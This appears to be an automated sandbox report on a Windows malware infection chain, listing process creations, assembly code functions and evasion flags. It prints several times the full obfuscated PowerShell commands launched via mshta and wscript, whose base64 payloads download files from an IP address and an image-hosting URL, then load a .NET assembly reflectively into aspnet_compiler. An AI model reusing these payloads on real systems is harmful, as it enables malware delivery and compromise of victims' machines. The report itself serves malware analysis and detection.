Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_028755D0 push ss; iretd 3_2_028755DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_02871E22 pushad ; iretd 3_2_02871E2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_02871CDB pushad ; iretd 3_2_02871D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_02871D6B pushad ; iretd 3_2_02871D7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04E41DF3 pushad ; iretd 8_2_04E41E02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04E41D63 pushad ; iretd 8_2_04E41DE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04E41E33 pushad ; iretd 8_2_04E41E52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04E41E03 pushad ; iretd 8_2_04E41E12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00416073 push ebx; iretd 12_2_00416083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0040C800 push ss; retf 12_2_0040C801
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00401931 push ebp; iretd 12_2_00401937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0041F183 pushfd ; retf 12_2_0041F1ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0041A9A7 push cs; retf 12_2_0041A9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00408230 pushad ; retf 12_2_00408258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00415B53 push ecx; retf 12_2_00415CA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00403330 push eax; ret 12_2_00403332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00411BB3 push esi; iretw 12_2_00411BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00411BB2 push esi; iretw 12_2_00411BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00415C19 push ecx; retf 12_2_00415CA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00415F43 push esi; ret 12_2_00415F4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00415F4F push ebx; iretd 12_2_00416083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00413F77 push esi; iretd 12_2_00413F82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004117F6 pushfd ; retf 12_2_004117FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B09AD push ecx; mov dword ptr [esp], ecx 12_2_012B09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
